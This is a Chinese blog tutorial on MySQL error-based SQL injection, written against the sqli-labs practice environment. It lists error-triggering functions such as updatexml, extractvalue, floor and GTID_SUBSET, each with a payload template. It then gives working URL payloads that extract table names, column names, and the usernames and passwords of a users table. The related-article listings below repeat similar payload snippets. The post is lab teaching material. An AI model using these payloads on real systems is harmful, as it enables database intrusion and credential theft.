SQL注入之报错注入

最新推荐文章于 2024-06-17 16:41:35 发布
最新推荐文章于 2024-06-17 16:41:35 发布
阅读量855 收藏 15
点赞数 19
分类专栏: 渗透学习 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/138978827
版权

目录

报错函数

ST_LatFromGeoHash()

格式

ST_LongFromGeoHash()

格式

GTID_SUBSET()

格式

GTID_SUBTRACT

格式

floor

格式

ST_Pointfromgeohash

格式

updatexml

格式

 extractvalue

格式

实验环境

开始实验

例子(以updataxml作为例子)

首先爆出数据库名

爆出表名

​编辑 爆列名

 爆数据

报错函数

ST_LatFromGeoHash()

(注:mysql>=5.7.x)

格式

ST_LatFromGeoHash(concat(0x7e,注入语句,0x7e))

ST_LongFromGeoHash()

(注:mysql>=5.7.x)

格式

ST_LongFromGeoHash(concat(0x7e,注入语句,0x7e))

GTID_SUBSET()

(注:mysql>=5.6.x)

格式

gtid_subset(concat(0x7e,注入语句,0x7e),1)

GTID_SUBTRACT

(注:mysql>=5.6.x)

格式

gtid_subtract(concat(0x7e,注入语句,0x7e),1)

floor

(注:8.x>mysql>5.0)

格式

(select 1 from (select count(*),concat(注入语句,floor(rand(0)*2))x from information_schema.tables group by x)a)

ST_Pointfromgeohash

(注:mysql>=5.7)

格式

ST_PointFromGeoHash(注入语句,1)

updatexml

这个报错长度是由一定限度的

格式

updatexml(1,concat(0x7e,注入语句,0x7e),1)

 extractvalue

格式

extractvalue(1,concat(0x7e,database(),0x7e))

实验环境

sqli-LABS靶场第一关

开始实验

报错注入和使用union注入流程一致不过是吧其中的union替换成报错函数

例子(以updataxml作为例子)

首先爆出数据库名

爆出表名

但是由于updataxml报错长度有一定限制,有可能报错出来的数据不全。我们可以使用limit来查看是否将所有表名全部爆出(上面的例子爆出来的数据是全的,下面是演示如何用limit爆出来数据)

limit爆数据

注:在使用limit时要将group_concat去掉

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema ='security' limit 1,1),0x7e),1)

 逐渐修改limit的值最终将所有表名爆出来

 

 爆列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema ='security' and table_name='users' limit 0,1),0x7e),1)

这个也可能会出现报错不够的情况 ,再使用limit

 爆数据

这次爆数据时就出现了报错不够的情况,可以使用limit来爆出剩下的数据

id=1' and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)--+

?id=1' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)--+

 

不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚ 

板栗妖怪
关注
  • 19
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
33-33.渗透测试渗透测试之SQL注入基于注入(下)
05-10
渗透测试渗透测试之SQL注入基于注入(下)
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
注入七大常用函数
weixin_54217950的博客
02-15 6320
注入七大大常用函数 1.ST_LatFromGeoHash()(mysql>=5.7.x) and ST_LatFromGeoHash(concat(0x7e,(),0x7e))--+ 2.ST_LongFromGeoHash(mysql>=5.7.x) 同 8 ,都使用了嵌套查询 and ST_LongFromGeoHash(concat(0x7e,(),0x7e))--+ 3.GTID (MySQL >= 5.6.X - 显<=200) 0x01 GTID GTID是M
updataxml注入
bangyan3903的博客
08-17 897
// take the variables//接受变量 // //也就是插入post提交的uname和passwd,参见:https://www.w3school.com.cn/sql/sql_insert.asp if(isset($_POST['uname']) && isset($_POST['passwd'])) { //making sure u...
「漏洞复现」悦库企业网盘 /user/login/.html SQL注入漏洞
最新发布
qq_39894062的博客
06-17 575
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
SQL注入绕过正则及无列名注入
热门推荐
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则表达式及无列名注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无列名注入 1、利用 join-using 注列名 2、无列名查询 五、注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显
12、SQL注入——SQL注入
qq_55202378的博客
12-05 489
通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号名、用户名等)通过页面的误提示显示出来。
SQL注入注入的一些随笔
郁离歌丶的博客
03-21 4502
0x00.序言关于注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()注入http:/...
32-32.渗透测试SQL注入基于注入(上)
05-10
32-32.渗透测试SQL注入基于注入(上)
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或误...
SQL注入思路详解
12-14
2. **注入(Error Based)**:利用误信息泄露数据库信息,如MySQL的`information_schema.tables`。 3. **布尔盲注(Boolean Based Blind)**:通过改变查询的布尔结果来判断数据的真假。 4. **时间盲注(Time ...
注入7大常用函数
qq_64395221的博客
05-21 1036
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集) GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会。#获取users表里的段名。
sqli靶场——【Less-5】注入
weixin_63082823的博客
09-14 486
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a; 以上语句可以简化成如下的形式: select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 683
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
sql注入-注入2】GTID_SUBTRACT()函数 注入
07-10 6263
注入】GTID_SUBTRACT()函数的使用
sql注入---注入
arissa666的博客
07-18 182
输入语句 v' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #前提是未关闭数据库函数,对于一些SQL语句的误直接回显在页面上;或者后台未对一些具有功能的函数进行过滤。updatexml():对XML文档数据进行查询和修改。extractvalue():对XML文档数据进行查询。知道数据库名字,刚才的版本5.0以上肯定 用默认数据库。可以看到返回的sql版本是5.5.53。floor():取整的函数。二、查看数据库当前用户。
注入函数指南
qq_28624871的博客
05-01 2195
1. geometrycollection() mysql版本5.5   (1)函数解释: GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。   (2)官方文档中举例的用法如下: GEOMETRYCOLLECTION(POINT(10 10), POINT(30 30), LINESTRING(15 15, 20 20))   (3)原因: 因为MYSQL无法使用这样的字符串画
SQL注入----注入简介(updatexml)
一只web狗
06-21 3404
注入(updatexml)常用语句
注入常用函数
qq_58000413的博客
11-02 648
慢慢补充其他数据库的函数。
sql注入updatexml注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值